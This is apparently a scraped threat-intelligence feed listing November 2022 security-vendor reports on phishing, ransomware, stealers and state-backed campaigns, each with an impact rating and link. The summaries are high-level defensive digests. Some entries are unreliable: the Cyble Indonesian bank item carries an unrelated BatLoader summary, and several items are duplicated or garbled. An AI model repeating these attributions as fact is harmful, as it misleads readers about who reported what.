Source: https://krebsonsecurity.com/2022/11/disneyland-malware-team-its-a-puny-world-after-all/?replytocom=571703

Intel Source:: Cofense

Intel Name:: Phishing_Campaign_Abusing_MS_Customer_Voice_URLs

Date of Scan:: 2022-11-17

Impact:: MEDIUM

Summary:: Researchers from Cofense have observed phishing campaigns abusing Microsoft Customer Voice URLs. Microsoft Customer Voice is a customer engagement/survey service that is used for plenty of benign and useful reasons.

Source: https://cofense.com/blog/microsoft-customer-voice-urls-used-in-latest-phishing-campaign

Intel Source:: Trellix

Intel Name:: An_Examination_of_Wiper_Families

Date of Scan:: 2022-11-17

Impact:: LOW

Summary:: Researchers from Trellix have analyzed more than twenty recent wiper families, their trends, techniques, and their overlap with other wipers.

Source: https://www.trellix.com/en-us/about/newsroom/stories/research/wipermania-an-all-you-can-wipe-buffet.html

Intel Source:: McAfee

Intel Name:: Advantage_of_FTX_Bankruptcy_by_threat_actors

Date of Scan:: 2022-11-17

Impact:: LOW

Summary:: McAfee has discovered several phishing sites targeting FTX users. One of the sites discovered was registered on the 15th of November and asks users to submit their crypto wallet phrase to receive a refund. After entering this phrase, the creators of the site would gain access to the victim’s crypto wallet and they would likely transfer all the funds out of it.

Source: https://www.mcafee.com/blogs/other-blogs/mcafee-labs/threat-actors-taking-advantage-of-ftx-bankruptcy/

Intel Source:: Fortinet

Intel Name:: Debugging_DotNET_Malware

Date of Scan:: 2022-11-17

Impact:: MEDIUM

Summary:: Researchers from Fortinet have described how we can create a custom .NET program to help debug a DLL loaded and invoked directly in memory.

Source: https://www.fortinet.com/blog/threat-research/debugging-net-malware-in-a-multi-stage-malware-deployment

Intel Source:: Blackberry

Intel Name:: ARCrypter_Ransomware_Spreading_From_Latin_America_to_the_World

Date of Scan:: 2022-11-17

Impact:: MEDIUM

Summary:: Researchers from BlackBerry have identified additional samples of interest for ARCrypter ransomware and expanded its operations from Latin America to the World. Based on the unique strings identified during the analysis, they have named this unknown ransomware variant “ARCrypter".

Source: https://blogs.blackberry.com/en/2022/11/arcrypter-ransomware-expands-its-operations-from-latin-america-to-the-world

Intel Source:: CADO Security

Intel Name:: WatchDog_Continues_to_Targeting_East_Asian_CSPs

Date of Scan:: 2022-11-17

Impact:: LOW

Summary:: Researchers from Cado Labs have discovered the re-emergence of the threat actor WatchDog. This is an opportunistic and prominent threat actor, who is known for routinely carrying out cryptojacking attacks against resources hosted by various Cloud Service Providers.

Source: https://www.cadosecurity.com/watchdog-continues-to-target-east-asian-csps/

Intel Source:: SentinelOne

Intel Name:: Diving_Deep_into_Venus_Ransomware

Date of Scan:: 2022-11-17

Impact:: LOW

Summary:: Researchers from SentinelOne have analyzed the Venus ransomware and provided further analysis, indicators of compromise, and TTPs.

Source: https://www.sentinelone.com/blog/venus-ransomware-zeoticus-spin-off-shows-sophistication-isnt-necessary-for-success/

Intel Source:: Proofpoint

Intel Name:: Emotet_Delivering_via_Malicious_Email

Date of Scan:: 2022-11-16

Impact:: MEDIUM

Summary:: Researchers from Proofpoint have observed multiple changes to Emotet and its payloads including the lures used, and changes to the Emotet modules, loader, and packer.

Source: https://www.proofpoint.com/us/blog/threat-insight/comprehensive-look-emotets-fall-2022-return

Intel Source:: Vmware

Intel Name:: Diving_Deep_into_Downloader_Malware

Date of Scan:: 2022-11-16

Impact:: LOW

Summary:: Researchers from VMware have analyzed the evasive downloader malware campaigns, addressing the history of BatLoader, its attributes, how it is delivered, the infection chain, and Carbon Black’s detection of the malware.

Source: https://blogs.vmware.com/security/2022/11/batloader-the-evasive-downloader-malware.html

Intel Source:: Rewterz

Intel Name:: Active_IOCs_of_Heodo_Malware

Date of Scan:: 2022-11-16

Impact:: LOW

Summary:: Researchers from Rewterz have identified the active IOCs of Heodo Malware. It is a malicious program that is a variant of Emotet.

Source: https://www.rewterz.com/rewterz-news/rewterz-threat-alert-an-emerging-heodo-malware-active-iocs

Intel Source:: PaloAlto

Intel Name:: Typhon_Stealer_Back_With_New_Capabilities

Date of Scan:: 2022-11-16

Impact:: LOW

Summary:: Researchers from PaloAlto have identified that Typhon Stealer provides threat actors with an easy-to-use, configurable builder for hire. They are continuing to update their code to enhance their tools and techniques to evade security systems and exfiltrate data smoothly.

Source: https://unit42.paloaltonetworks.com/typhon-reborn-stealer/

Intel Source:: ISC.SANS

Intel Name:: The_HTTP_CONNECT_malicious_requests

Date of Scan:: 2022-11-16

Impact:: LOW

Summary:: Researchers from SANS have analyzed and identified the HTTP CONNECT requests may have been an attempt to relay traffic through the honeypot and hide the original source of the request. It is also possible that the traffic may have been funneled through multiple proxy endpoints to make identification of the source difficult to identify. Allowing HTTP CONNECT on internet facing resources can potentially expose internal network resources or assist in the forwarding of malicious traffic.

Source: https://isc.sans.edu/diary/rss/29246

Intel Source:: Securelist

Intel Name:: North_Korean_hackers_target_European_organization

Date of Scan:: 2022-11-16

Impact:: LOW

Summary:: Researchers from Securelist have identified North Korean hackers are using a new version of the DTrack backdoor to attack organizations in Europe and Latin America.

Source: https://securelist.com/dtrack-targeting-europe-latin-america/107798/

Intel Source:: CISA

Intel Name:: Iranian_hackers_breached_federal_agency_using_Log4Shell_exploit

Date of Scan:: 2022-11-16

Impact:: HIGH

Summary:: The FBI and CISA revealed in a joint advisory published today that an unnamed Iranian-backed threat group hacked a Federal Civilian Executive Branch (FCEB) organization to deploy XMRig cryptomining malware.

Source: https://www.cisa.gov/uscert/ncas/current-activity/2022/11/16/cisa-and-fbi-release-advisory-iranian-government-sponsored-apt

Intel Source:: Fortinet

Intel Name:: New_RapperBot_Campaign

Date of Scan:: 2022-11-16

Impact:: MEDIUM

Summary:: Fortinet reserachers observed new samples with the same distinctive C2 protocol used by RapperBot were detected. in August 2022, there was a significant drop in the number of samples collected in the wild. It is quickly evident that these samples are part of a separate campaign to launch Distributed Denial of Service (DDoS) attacks against game servers. With the several similarities between previous and present it is believed that either the same threat actor might be behind both campaigns or each campaign might have branched from the same privately-shared source code.

Source: https://www.fortinet.com/blog/threat-research/new-rapperbot-campaign-ddos-attacks

Intel Source:: ASEC

Intel Name:: Dagon_Locker_Ransomware_Distributing_in_Korea

Date of Scan:: 2022-11-16

Impact:: LOW

Summary:: ASEC researchers have discovered that the DAGON LOCKER ransomware is being distributed in Korea. It is commonly distributed through phishing mails or as an attachment to emails, but because it is a ransomware-as-a-service, the distribution route and target can vary according to the threat actor.

Source: https://asec.ahnlab.com/en/42037/

Intel Source:: Symantec

Intel Name:: Chinese_Hackers_Targeting_Government_Agencies

Date of Scan:: 2022-11-15

Impact:: MEDIUM

Summary:: Researchers from Symantec have identified a cyberespionage threat actor tracked as Billbug (a.k.a. Thrip, Lotus Blossom, Spring Dragon) has been running a campaign targeting a certificate authority, government agencies, and defense organizations in several countries in Asia.

Source: https://symantec-enterprise-blogs.security.com/blogs/threat-intelligence/espionage-asia-governments-cert-authority

Intel Source:: Rewterz

Intel Name:: Active_IOCs_of_SharpPanda_APT_Group

Date of Scan:: 2022-11-15

Impact:: MEDIUM

Summary:: Researchers from Rewterz have identified the active IOCs of SharpPanda APT Group. SharpPanda APT attacks and targets Southeast Asian government users with template injection of malicious documents. The attackers use spear-phishing to gain initial access and leverage old Microsoft Office vulnerabilities together with the chain of in-memory loaders to attempt and install a previously unknown backdoor on the victim’s machines.

Source: https://www.rewterz.com/rewterz-news/rewterz-threat-alert-sharppanda-apt-group-active-iocs

Intel Source:: Cyble

Intel Name:: Indonesian_BRI_Bank_targeted_by_phishing_campaigns

Date of Scan:: 2022-11-15

Impact:: LOW

Summary:: VMware Carbon Black Managed Detection and Response (MDR) analysts have identified a threat that has been circuling over the last couple of months BatLoader. BatLoader is an initial access malware that heavily uses batch and PowerShell scripts to gain a foothold on a victim machine and deliver other malware. The analysts sharing their analyses about this malware campaign, addressing the history of BatLoader, its attributes, how it is delivered, the infection chain, and Carbon Black’s detection of the malware.

Source: https://blog.cyble.com/2022/11/15/phishing-campaign-targeting-indonesian-bri-bank-using-sms-stealer/

Intel Source:: Intezer

Intel Name:: Hackers_Abusing_LNK_Files

Date of Scan:: 2022-11-15

Impact:: LOW

Summary:: Intezer researchers have described how threat actors use LNK files in the different stages of attacks.

Source: https://www.intezer.com/blog/malware-analysis/how-threat-actors-abuse-lnk-files/

Intel Source:: TrendMicro

Intel Name:: New_Earth_Longzhi_APT_Targeting_Ukraine_and_Asian_Countries

Date of Scan:: 2022-11-15

Impact:: LOW

Summary:: Researchers from Trendmicro have observed that threat group Earth Longzhi targeting Ukraine and Asian countries with custom Cobalt Strike loaders.

Source: https://www.trendmicro.com/en_us/research/22/k/hack-the-real-box-apt41-new-subgroup-earth-longzhi.html

Intel Source:: Cyfirma

Intel Name:: A_Deep_Examination_of_Prestige_Ransomware

Date of Scan:: 2022-11-15

Impact:: LOW

Summary:: Researchers from Cyfirma have analyzed the Prestige Ransomware.

Source: https://www.cyfirma.com/outofband/prestige-ransomware-analysis/

Intel Source:: Rewterz

Intel Name:: Active_IOCs_of_Black_Basta_Ransomware

Date of Scan:: 2022-11-15

Impact:: LOW

Summary:: Researchers from Rewterz have identified the active IOCs of Black Basta Ransomware. It is a new ransomware that encrypts data stored on clients’ hard drives.

Source: https://www.rewterz.com/rewterz-news/rewterz-threat-alert-black-basta-ransomware-active-iocs-5

Intel Source:: Rewterz

Intel Name:: Active_IOCs_of_Phobos_Ransomware

Date of Scan:: 2022-11-15

Impact:: LOW

Summary:: Researchers from Rewterz have identified the active IOCs of Phobos ransomware. It is based on the Dharma malware that first appeared at the beginning of 2019.

Source: https://www.rewterz.com/rewterz-news/rewterz-threat-alert-phobos-ransomware-active-iocs-27

Intel Source:: Rewterz

Intel Name:: Active_IOCs_of_REvil_Ransomware

Date of Scan:: 2022-11-15

Impact:: LOW

Summary:: Researchers from Rewterz have identified the active IOCs of REvil Ransomware. It is (also known as Sodinokibi) a Ransomware-as-a-Service (RaaS).

Source: https://www.rewterz.com/rewterz-news/rewterz-threat-alert-revil-ransomware-active-iocs-20

Intel Source:: DFIR Report

Intel Name:: Hackers_Leveraging_BumbleBee_to_Load_Meterpreter_and_CobaltStrike

Date of Scan:: 2022-11-15

Impact:: LOW

Summary:: Researchers from DFIR report have identified threat actors leveraged BumbleBee to load a Meterpreter agent and Cobalt Strike Beacons.

Source: https://thedfirreport.com/2022/11/14/bumblebee-zeros-in-on-meterpreter/

Intel Source:: DCSO CyTec Blog

Intel Name:: StrelaStealer_and_IceXLoader_Drive_InfoStealing_Campaigns

Date of Scan:: 2022-11-14

Impact:: LOW

Summary:: Researchers from DCSO CyTec have discovered new waves of malware campaigns, with two information-stealing malware making rounds in the wild. Named StrelaStealer and IceXLoader, both malware leverage malicious email attachments to lure their targets.

Source: https://medium.com/@DCSO_CyTec/shortandmalicious-strelastealer-aims-for-mail-credentials-a4c3e78c8abc

Intel Source:: Sucuri

Intel Name:: Massive_oisDOTis_Black_Hat_Redirect_Malware_Campaign

Date of Scan:: 2022-11-14

Impact:: LOW

Summary:: Researchers from Sucuri have identified that ois[.]is Black Hat redirecting to the malware campaign. These malicious redirects appear to be designed to increase the authority of the attacker’s sites for search engines.

Source: https://blog.sucuri.net/2022/11/massive-ois-is-black-hat-redirect-malware-campaign.html

Intel Source:: Talos

Intel Name:: Cyber_adoption_of_IPFS_for_different_malware_campaigns

Date of Scan:: 2022-11-14

Impact:: LOW

Summary:: Cisco Talos has observed multiple ongoing campaigns that leverage the IPFS network to host their malware payloads and phishing kit infrastructure while facilitating other attacks.

Source: https://blog.talosintelligence.com/ipfs-abuse/

Intel Source:: Akamai

Intel Name:: New_KmsdBot_Malware_Hijacking_Systems

Date of Scan:: 2022-11-14

Impact:: LOW

Summary:: Researchers from Akamai have identified a newly discovered evasive malware that leverages the Secure Shell (SSH) cryptographic protocol to gain entry into targeted systems with the goal of mining cryptocurrency and carrying out distributed denial-of-service (DDoS) attacks.

Source: https://www.akamai.com/blog/security-research/kmdsbot-the-attack-and-mine-malware

Intel Source:: ASEC

Intel Name:: Dropper_Type_Malware_Bomb_Back_Again

Date of Scan:: 2022-11-14

Impact:: LOW

Summary:: ASEC researchers found that dropper malware, which disguised itself as a crack, is being actively distributed again. Once the malware is executed, the affected system becomes infected with numerous malware programs.

Source: https://asec.ahnlab.com/en/41972/

Intel Source:: QuickHeal

Intel Name:: QBOT_Leveraging_HTML_Smuggling_Technique

Date of Scan:: 2022-11-14

Impact:: LOW

Summary:: Researchers from QuickHeal have observed a new technique that QBot leverages for its attack. It is called an “HTML Smuggling attack.”

Source: https://blogs.quickheal.com/qbot-a-html-smuggling-technique-to-target-victims/

Intel Source:: CERT-UA

Intel Name:: UAC-0118_Group_Using_Somnia_Malware

Date of Scan:: 2022-11-11

Impact:: MEDIUM

Summary:: Researchers from CERT-UA have investigated threat group FRwL (aka Z-Team) and found that the initial compromise occurred as a result of downloading and running a file that mimicked the "Advanced IP Scanner" software, but actually contained the Vidar malware.

Source: https://cert.gov.ua/article/2724253

Intel Source:: ASEC

Intel Name:: Magniber_Ransomware_Bypassing_MOTW

Date of Scan:: 2022-11-11

Impact:: LOW

Summary:: ASEC researchers have observed that the script format found from September 8th to September 29th, 2022, bypassed Mark of the Web (MOTW), a feature offered by Microsoft that identifies the source of files.

Source: https://asec.ahnlab.com/en/41889/

Intel Source:: ISC.SANS

Intel Name:: Another_malicious_VisualBasic_script

Date of Scan:: 2022-11-10

Impact:: LOW

Summary:: Researchers from SANS have identified a malicious VVisualBasic script that attracted their attention. It's no flagged as malicious but, even more, it’s reported as a simple mallicious script.

Source: https://isc.sans.edu/diary/Another%20Script-Based%20Ransomware/29234

Intel Source:: Zimperium

Intel Name:: The_deep_details_of_Cloud9_Chrome_Botnet

Date of Scan:: 2022-11-10

Impact:: LOW

Summary:: The Zimperium Labs reserachers recently discovered a malicious browser extension that steals the information available during the browser session and also installs malware on a user’s device and subsequently assume control of the entire device. The team provided the deeper analyses into the architecture and modus operandi of this malicious browser extension, originally called Cloud9, by the malware author.

Source: https://www.zimperium.com/blog/the-case-of-cloud9-chrome-botnet/

Intel Source:: Cyble

Intel Name:: The_return_of_Emotet_targeting_users_worldwide

Date of Scan:: 2022-11-10

Impact:: HIGH

Summary:: Cyble Research and Intelligence Labs (CRIL) observed the recent Emotet spam campaign spreading malicious xls, xlsm, and password-protected zip files as an attachment to infect users. These office documents contain malicious macro code which downloads the actual Emotet binary from the remote server. Cyble intelligence shows that the recent Emotet campaign is widespread worldwide, targeting 40 countries. And this latest strain is spreading Bumblebee and IcedID malware.

Source: https://blog.cyble.com/2022/11/09/emotet-returns-targeting-users-worldwide/

Intel Source:: Sucuri

Intel Name:: The_analyses_of_Black_Hat_redirect_campaign

Date of Scan:: 2022-11-09

Impact:: LOW

Summary:: Sucuri research team has tracked a surge in WordPress malware redirecting website visitors to fake sites attackers.They showed their analyses what this infection does, how the malicious redirects work.

Source: https://blog.sucuri.net/2022/11/massive-ois-is-black-hat-redirect-malware-campaign.html

Intel Source:: TrendMicro

Intel Name:: Diving_Deep_into_DeimosC2_C&C_Framework

Date of Scan:: 2022-11-09

Impact:: LOW

Summary:: Researchers from TrendMicro have analyzed the technical details of DeimosC2 C&C framework.

Source: https://www.trendmicro.com/en_us/research/22/k/deimosc2-what-soc-analysts-and-incident-responders-need-to-know.html

Intel Source:: ASEC

Intel Name:: The_distribution_of_LockBit_3.0_Being_Distributed_by_Amadey_Bot

Date of Scan:: 2022-11-09

Impact:: MEDIUM

Summary:: The ASEC analysis team has observed and confirmed that attackers are using Amadey Bot to install LockBit. Amadey Bot, a malware that was first discovered in 2018, is capable of stealing information and installing additional malware by receiving commands from the attacker.

Source: https://asec.ahnlab.com/en/41450/

Intel Source:: Any.Run

Intel Name:: FormBook_stealer

Date of Scan:: 2022-11-09

Impact:: LOW

Summary:: The Any.Run analysts recorded a of malware analysis service allows us to take an in-depth look at the behavior of this clever virus and other malware such as Dridex and Lokibot with their elaborate anti-evasion techniques.

Source: https://any.run/malware-trends/formbook

Intel Source:: Fortinet

Intel Name:: The_analyses_of_malicious_use_of_multiple_intermittent_.NET_binaries

Date of Scan:: 2022-11-09

Impact:: LOW

Summary:: FortiGuard Labs recently analyzed a fake phishing email that drops the Warzone RAT and showed that it does using multiple intermittent .NET binaries that are increasingly obfuscated.

Source: https://www.fortinet.com/blog/threat-research/tips-and-tricks-using-the-net-obfuscator-against-itself

Intel Source:: Sophos

Intel Name:: The_repeated_use_of_DLL-hijack_execution

Date of Scan:: 2022-11-09

Impact:: LOW

Summary:: The Sophos researchers have observed multiple attacks targeting government organizations in Asia, involving DLL sideloading – on of the most comon technique of China-based APT groups and shared the evidence og the connection of the inidents and how threat actors base their attacks on well-known, effective techniques, adding complexity and variation over time.

Source: https://news.sophos.com/en-us/2022/11/03/family-tree-dll-sideloading-cases-may-be-related/

Intel Source:: Minerva-labs

Intel Name:: A_new_updated_IceXLoader_malware

Date of Scan:: 2022-11-09

Impact:: MEDIUM

Summary:: IceXLoader was discovered earlier this year.It is a commercial malware used to download and deploy additional malware on infected machines. While the version discovered in June (v3.0) Minerva-lab researchers recently observed a newer v3.3.3 loader which looks to be fully functionable and includes a multi-stage delivery chain.

Source: https://minerva-labs.com/blog/new-updated-icexloader-claims-thousands-of-victims-around-the-world/

Intel Source:: Cyble

Intel Name:: Modified_Chaos_Ransomware_Killnet_in_the_wild

Date of Scan:: 2022-11-09

Impact:: MEDIUM

Summary:: Researchers from Cyble discovered Data-destructive ransomware related to the pro-Russian Threat Actors (TA) organization "Killnet" The ransomware drops a note directed to a Telegram page for supporting Russian hacktivists. The ransomware is seen targeting multiple adversaries across the globe.

Source: https://blog.cyble.com/2022/11/08/pro-russian-hacktivists-targeting-adversaries-with-killnet-ransomware/

Intel Source:: Any.Run

Intel Name:: Raccoon_stealer_2.0_malware_analysis

Date of Scan:: 2022-11-09

Impact:: LOW

Summary:: The Any.Run analysts triaged multiple Raccoon stealer V2 samples, collected typical behavior activities, and briefly described its execution process. They also provided more deeper and more detailed Raccoon stealer 2.0 malware analysis to follow all steps and get a complete picture of the info stealer's behavior.

Source: https://thehackernews.com/2022/11/inside-raccoon-stealer-v2.html https://any.run/malware-trends/raccoon?utm_source=hacker_news&utm_medium=article&utm_campaign=raccoon&utm_content=mtt

Intel Source:: AbnormalSecurity

Intel Name:: Crimson_Kingsnake_threat_impersonation

Date of Scan:: 2022-11-08

Impact:: LOW

Summary:: The researchers discovered a new BEC group that impersonating tactics to swindle companies around the world. The group is called Crimson Kingsnake, impersonates real attorneys, law firms, and debt recovery services to deceive accounting professionals into quickly paying bogus invoices. Also they observed Crimson Kingsnake target companies throughout the United States, Europe, the Middle East, and Australia.

Source: https://abnormalsecurity.com/blog/crimson-kingsnake-bec-group-attacks

Intel Source:: SentinelOne

Intel Name:: The_expansion_of_SocGholish_malware

Date of Scan:: 2022-11-08

Impact:: LOW

Summary:: Researchers from SentinelOne discovered the expanding their infrastructure for staging malware with new servers. This helps the operators to counter defensive operations against known servers and scale up their operation.

Source: https://www.sentinelone.com/labs/socgholish-diversifies-and-expands-its-malware-staging-infrastructure-to-counter-defenders/

Intel Source:: ISC.SANS

Intel Name:: WindowMalware_with_VHD_Extension

Date of Scan:: 2022-11-07

Impact:: LOW

Summary:: Researchers from SANS have analyzed a phishing email including an attachment and found the email as a PDF but is in fact a VHD file.

Source: https://isc.sans.edu/diary/Windows+Malware+with+VHD+Extension/29222/

Intel Source:: ISC.SANS

Intel Name:: Remcos_Downloader_with_Unicode_Obfuscation

Date of Scan:: 2022-11-07

Impact:: LOW

Summary:: Researchers from SANS have analyzed a malicious RAR archive containing a VBS script. It was called “Unidad judicial citacion pendiente Fiscalia.rar” and protected with a simple 4-numbers password to defeat automatic scanning. The same name appears inside the VBS script.

Source: https://isc.sans.edu/diary/rss/29220

Intel Source:: ISC.SANS

Intel Name:: Windows_Malware_with_VHD_Extension

Date of Scan:: 2022-11-07

Impact:: LOW

Summary:: Researchers from SANS have analyzed a phishing email including an attachment and found the email as a PDF but is in fact a VHD file.

Source: https://isc.sans.edu/diary/Windows+Malware+with+VHD+Extension/29222/

Intel Source:: IronNet

Intel Name:: Robin_Banks_Phishing_Service_Back_to_Steal_Banking_Accounts

Date of Scan:: 2022-11-07

Impact:: LOW

Summary:: Researchers from IronNet have identified that the Robin Banks phishing-as-a-service (PhaaS) platform is back in action with infrastructure hosted by a Russian internet company that offers protection against distributed denial-of-service (DDoS) attacks.

Source: https://www.ironnet.com/blog/robin-banks-still-might-be-robbing-your-bank-part-2

Intel Source:: Zscaler

Intel Name:: APT36_Targeting_Indian_Governmental_Organizations

Date of Scan:: 2022-11-07

Impact:: MEDIUM

Summary:: According to Zscaler researchers, APT-36 (also known as Transparent Tribe) targets users working at Indian government organizations with updated TTPs and tools.

Source: https://www.zscaler.com/blogs/security-research/apt-36-uses-new-ttps-and-new-tools-target-indian-governmental-organizations

Intel Source:: Cyble

Intel Name:: New_Laplas_Clipper_Malware_distributed_through_SmokeLoader

Date of Scan:: 2022-11-04

Impact:: LOW

Summary:: Researchers from Cyble Identified a new attack technique leveraging SmokeLoader to load various malware into the target system, compromised through spam emails. The campaign seems to be highly active in the wild, using Laplas Clipper targetting Cryptocurrency users.

Source: https://blog.cyble.com/2022/11/02/new-laplas-clipper-distributed-by-smokeloader/

Intel Source:: Blackberry

Intel Name:: The_threat_actor_RomCom_new_attacks

Date of Scan:: 2022-11-04

Impact:: LOW

Summary:: The BlackBerry Threat Research and Intelligence team shed light on RomCom's new attack campaigns spoofing legitimate network scanning tools through phishing and spoofed domains targetting Ukraine and other English-speaking countries delivering RomComs RAT.

Source: https://blogs.blackberry.com/en/2022/11/romcom-spoofing-solarwinds-keepass

Intel Source:: Securonix

Intel Name:: Apache_Commons_Text4Shell_Vulnerability

Date of Scan:: 2022-11-04

Impact:: MEDIUM

Summary:: Securonix researchers have analyzed the Apache Commons Text library vulnerability that is currently being exploited. On October 13, Apache Software Foundation was notified of a Text4shell vulnerability affecting versions 1.5 to 1.9. It has been patched in version 1.10.0.

Source: https://www.securonix.com/blog/apache-commons-text4shell/

Intel Source:: Group-IB

Intel Name:: OPERA1ER_APT_Hackers_attacks

Date of Scan:: 2022-11-04

Impact:: LOW

Summary:: Researchers from Group-IB have identified that a French-speaking threat actor named OPERA1ER has been linked to a series of more than 30 successful cyber attacks aimed at banks, financial services, and telecom companies across Africa, Asia, and Latin America between 2018 and 2022.

Source: https://blog.group-ib.com/opera1er-apt

Intel Source:: SentinelOne

Intel Name:: New_Black_Basta_Ransomware_Tools_and_tactics

Date of Scan:: 2022-11-04

Impact:: LOW

Summary:: Sentinel Labs researchers shed light on the highly evasive Black Basta Ransomware, which they link to FIN7 or one of their developer's operational TTPs in depth, exposing previously undiscovered tools and tactics.

Source: https://www.sentinelone.com/labs/black-basta-ransomware-attacks-deploy-custom-edr-evasion-tools-tied-to-fin7-threat-actor/

Intel Source:: ESentire

Intel Name:: Raise_in_Chromeloader_Malware_attacks

Date of Scan:: 2022-11-04

Impact:: LOW

Summary:: Researchers from ESentire discovered the latest traces of Chromeloader Malware being spread in the wild. The malware seems more persistent, promising higher permissions on the target's system.

Source: https://www.esentire.com/blog/chromeloader-observations-on-the-rise

Intel Source:: VMware

Intel Name:: Ransomware_targeting_ESXi

Date of Scan:: 2022-11-04

Impact:: LOW

Summary:: Researchers from VMware's Threat Analysis Team shed details about various ransomware families targetting Enterprises leveraging VMware ESXi, their techniques, and tactics.

Source: https://blogs.vmware.com/security/2022/10/esxi-targeting-ransomware-tactics-and-techniques-part-2.html

Intel Source:: ASEC

Intel Name:: Elbie_Ransomware_Distributing_in_Korea

Date of Scan:: 2022-11-03

Impact:: LOW

Summary:: Using internal monitoring, ASEC researchers have discovered that ieinstal.exe is being used in the distribution of Elbie ransomware.

Source: https://asec.ahnlab.com/en/40907/

Intel Source:: ASEC

Intel Name:: Appleseed_Malware_Spreading_to_Nuclear_Power_Plant_Companies

Date of Scan:: 2022-11-03

Impact:: LOW

Summary:: Researchers from ASEC have discovered that AppleSeed has been distributed to nuclear power plants. Kimsuky, a North Korean affiliated organization, is actively distributing AppleSeed, a backdoor malware, to many companies.

Source: https://asec.ahnlab.com/en/41015/

Intel Source:: Securelist

Intel Name:: The_observation_of_public_cloud_services_attacks

Date of Scan:: 2022-11-03

Impact:: MEDIUM

Summary:: Kaspersky has reported several incidents where attackers used cloud services for C&C. They described in their report several interesting incidents for server-side attacks, C&C in public clouds and other MDR cases

Source: https://securelist.com/server-side-attacks-cc-in-public-clouds-mdr-cases/107826/

Intel Source:: SecurityAffairs

Intel Name:: Ignoring_of_old_Wannacry_ransomware

Date of Scan:: 2022-11-03

Impact:: MEDIUM

Summary:: In May 2017, the world learned about a global security attack, the Wannacry ransomware carried out through a malicious code capable of encrypting data residing in information systems and demanding a ransom in cryptocurrency to restore them, the Wannacry ransomware. That attack was considered to be the worst cyber attack in terms of contamination rate and scope, putting public offices and companies (especially healthcare facilities) out of operation. By this happening, some companies still didn't learn the lesson and still ignoring it.

Source: https://securityaffairs.co/wordpress/137894/cyber-crime/wannacry-hybrid-malware.html

Intel Source:: Symantec

Intel Name:: Cranefly_Hackers_Installing_Undocumented_Malware

Date of Scan:: 2022-11-03

Impact:: LOW

Summary:: A Symantec researcher have discovered that an unknown dropper is being used to install a new backdoor and other tools by reading commands from seemingly innocuous Internet Information Services (IIS) logs.

Source: https://symantec-enterprise-blogs.security.com/blogs/threat-intelligence/cranefly-new-tools-technique-geppei-danfuan

Intel Source:: PaloAlto

Intel Name:: Techniques_used_by_notorious_banking_Trojans

Date of Scan:: 2022-11-03

Impact:: LOW

Summary:: Palo Alto ranalysts summarized techniques used by notorious banking Trojan families to evade detection, steal sensitive data and manipulate data. We’ll also describe how those techniques can be blocked. These families include Zeus, Kronos, Trickbot, IcedID, Emotet and Dridex.

Source: https://unit42.paloaltonetworks.com/banking-trojan-techniques/

Intel Source:: Wordsfence

Intel Name:: The_Fox_Hack_malicious_functions

Date of Scan:: 2022-11-03

Impact:: LOW

Summary:: The Wordfence threat analysts recently discovered the latest version of a Command and Control (C2) script, which is referred to as F-Automatical within the script’s code and was commonly known as FoxAuto in older versions. This version of this automatic C2 script that is developed and distributed by a threat group called Anonymous Fox. This script allows for anything from simple information stealing attacks, up to full site takeover, and more.

Source: https://www.wordfence.com/blog/2022/10/what-does-the-fox-hack-breaking-down-the-anonymous-fox-f-automatical-script/

Intel Source:: ASEC

Intel Name:: Surtr_Ransomware_Distributing_in_Korea

Date of Scan:: 2022-11-03

Impact:: LOW

Summary:: Researchers from ASEC have discovered that Surtr ransomware is being distributed. This ransomware encrypts files, then adds a “[DycripterSupp@mailfence.com].[].Surtr” file extension to the original file extension name.

Source: https://asec.ahnlab.com/en/41092/

Intel Source:: PaloAlto

Intel Name:: A_Guloader_variant_techniques

Date of Scan:: 2022-11-03

Impact:: LOW

Summary:: Unit 42 researchers observed a new Guloader variant that contains a shellcode payload protected by anti-analysis techniques. Their purpose is to slow human analysts and sandboxes processing this sample.

Source: https://unit42.paloaltonetworks.com/guloader-variant-anti-analysis/

Intel Source:: ISC.SANS

Intel Name:: Transformation_of_DarkVNC_from_VNC

Date of Scan:: 2022-11-02

Impact:: LOW

Summary:: A team of researchers from SANS have analyzed Virtual Network Computing (VNC), which is a method for controlling a computer remotely. In addition, VNC is a cross-platform screen-sharing system that allows full keyboard and visual control of a remote computer as if you were physically present.

Source: https://isc.sans.edu/diary/rss/29210

Intel Source:: Crowdstrike

Intel Name:: Vulnerable_Docker_and_Kubernetes_Infrastructure_targeted_by_a_Kiss-a-Dog_Cryptojacking_Campaign

Date of Scan:: 2022-11-02

Impact:: LOW

Summary:: The CrowdStrike team have identified a new cryptojacking campaign called "Kiss-a-dog" that targets vulnerable Docker and Kubernetes infrastructures. The campaign uses an obscure domain from the payload, container escape attempts, and anonymized dog mining pools to target Docker and Kubernetes infrastructures.

Source: https://www.crowdstrike.com/blog/new-kiss-a-dog-cryptojacking-campaign-targets-docker-and-kubernetes/

Intel Source:: VMware

Intel Name:: ShadowPad_malware_analyses

Date of Scan:: 2022-11-02

Impact:: LOW

Summary:: VMware researchers have discovered active ShadowPad C2s on the Internet by analyzing the command and control (C2) protocol.

Source: https://blogs.vmware.com/security/2022/10/threat-analysis-active-c2-discovery-using-protocol-emulation-part3-shadowpad.html

Intel Source:: DFIRReport

Intel Name:: Follina_Vulnerability_triggering_Qbot_infection_chain_compromising_Domain

Date of Scan:: 2022-11-02

Impact:: LOW

Summary:: The DFIR Report researchers discovered an intrusion using the Follina Vulnerability for Initial Access that caused Qbot infection, compromised the entire domain, launched several payloads, and evaded detection.

Source: https://thedfirreport.com/2022/10/31/follina-exploit-leads-to-domain-compromise/

Intel Source:: ISC.SANS

Intel Name:: A_payload_for_NetSupport_RAT_from_the_sczriptzzbn_inject

Date of Scan:: 2022-11-01

Impact:: LOW

Summary:: This month reserchers from SANS had seeing a payload for NetSupport RAT from the sczriptzzbn inject. This injected script causes a fake browser update page to appear in the victim's browser.

Source: https://isc.sans.edu/diary/rss/29170

Intel Source:: MalwareBytes

Intel Name:: The_remote_desktop_services_targeted_by_Venus_ransomware

Date of Scan:: 2022-11-01

Impact:: LOW

Summary:: Malwarebytes researchers shared about the threat actors behind the relatively new Venus Ransomware are hacking into publicly-exposed Remote Desktop services to encrypt Windows devices.

Source: https://www.malwarebytes.com/blog/news/2022/10/venus-ransomware-targets-remote-desktop-services

Intel Source:: Trustwave

Intel Name:: An_increase_in_threats_packaged_in_password_protected_archives

Date of Scan:: 2022-11-01

Impact:: LOW

